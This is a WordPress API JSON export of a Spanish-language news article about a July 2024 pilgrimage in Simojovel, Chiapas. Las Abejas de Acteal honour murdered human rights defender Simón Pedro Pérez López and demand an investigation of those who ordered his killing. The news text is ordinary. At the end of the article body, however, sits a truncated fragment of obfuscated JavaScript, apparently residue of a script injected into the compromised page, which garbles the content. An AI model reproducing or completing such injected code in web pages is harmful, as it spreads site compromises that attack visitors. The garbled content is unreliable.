{"id":16544,"date":"2024-07-06T04:12:41","date_gmt":"2024-07-06T04:12:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16544"},"modified":"2024-07-06T04:12:42","modified_gmt":"2024-07-06T04:12:42","slug":"se-realiza-peregrinacion-por-la-memoria-justicia-y-verdad-para-simon-pedro-perez-lopez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16544","title":{"rendered":"Se realiza Peregrinaci\u00f3n por la memoria, justicia y verdad para Sim\u00f3n Pedro P\u00e9rez L\u00f3pez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240705-WA0027-1024x682.jpg\" alt=\"\" class=\"wp-image-16545\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240705-WA0027-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240705-WA0027-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240705-WA0027-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240705-WA0027-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240705-WA0027.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>5 de julio del 2024. San Crist\u00f3bal de Las Casas.- Integrantes de la Voz de la Organizaci\u00f3n Sociedad Civil Las Abejas de Acteal, exigieron al Estado Mexicano y a la fiscal\u00eda reconozca que el m\u00f3vil del asesinato de Sim\u00f3n Pedro fue, porque defend\u00eda los Derechos humanos del pueblo, as\u00ed como se investigue y se publique la identidad de los autores intelectuales y paren la violencia que ha ido escalando, y garanticen la no repetici\u00f3n de m\u00e1s asesinatos.<\/p>\n\n\n\n<p>Tras leer un pronunciamiento, al concluir una peregrinaci\u00f3n por la memoria, justicia y verdad para Sim\u00f3n Pedro P\u00e9rez L\u00f3pez en Nueva Israelita, Simojovel, Chiapas, defensor de derechos humanos, recordaron que desde hace 3 a\u00f1os de su asesinato siguen exigiendo se reconozca que el m\u00f3vil de su asesinato, &#8220;fue por su trabajo de defensor comunitario y se abran l\u00edneas de investigaci\u00f3n que de con sus asesinaos intelectuales&#8221;.<\/p>\n\n\n\n<p>Lamentaron que a Sim\u00f3n Pedro le arrebataran la vida, cuando constru\u00eda la paz por el camino no violento del di\u00e1logo, en medio de la violencia, apoyando al pueblo en todo momento, \u201clo vimos devolver siempre el bien por el mal, luchando desde nuestra organizaci\u00f3n por el retorno de los desplazados, exigiendo el fin de la impunidad para Acteal y sirviendo siempre a los dem\u00e1s\u201d.<\/p>\n\n\n\n<p>\u201cHoy traemos a la memoria, la realidad de violencia que nuestro hermano Sim\u00f3n Pedro, ve\u00eda, sufr\u00eda y denunciaba como catequista y defensor de derechos humanos junto con el pueblo creyente y nuestra organizaci\u00f3n, la presencia de grupos armados articulados con el crimen organizado, la violencia que iba escalando, en nuestras comunidades de Simojovel, Pantelh\u00f3, y en Chenalh\u00f3\u201d, indicaron.<\/p>\n\n\n\n<p>\u201cSeguimos adelante, hasta que el autor material del asesinato de nuestro hermano Sim\u00f3n Pedro, fue condenado a la pena m\u00ednima de 25 a\u00f1os de c\u00e1rcel, a\u00fan as\u00ed, sus abogados interpusieron una apelaci\u00f3n a dicha sentencia, y sin haber investigaci\u00f3n sobre los autores intelectuales\u201d, concluyeron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 5 de julio del 2024. San Crist\u00f3bal de Las Casas.- Integrantes de la Voz de la Organizaci\u00f3n Sociedad Civil Las Abejas de Acteal, exigieron al Estado Mexicano y a la fiscal\u00eda reconozca que el m\u00f3vil del asesinato de Sim\u00f3n Pedro fue, porque defend\u00eda los Derechos humanos del pueblo, as\u00ed como se investigue &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16545,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16544","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16544"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16544\/revisions"}],"predecessor-version":[{"id":16546,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16544\/revisions\/16546"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16545"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16544"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}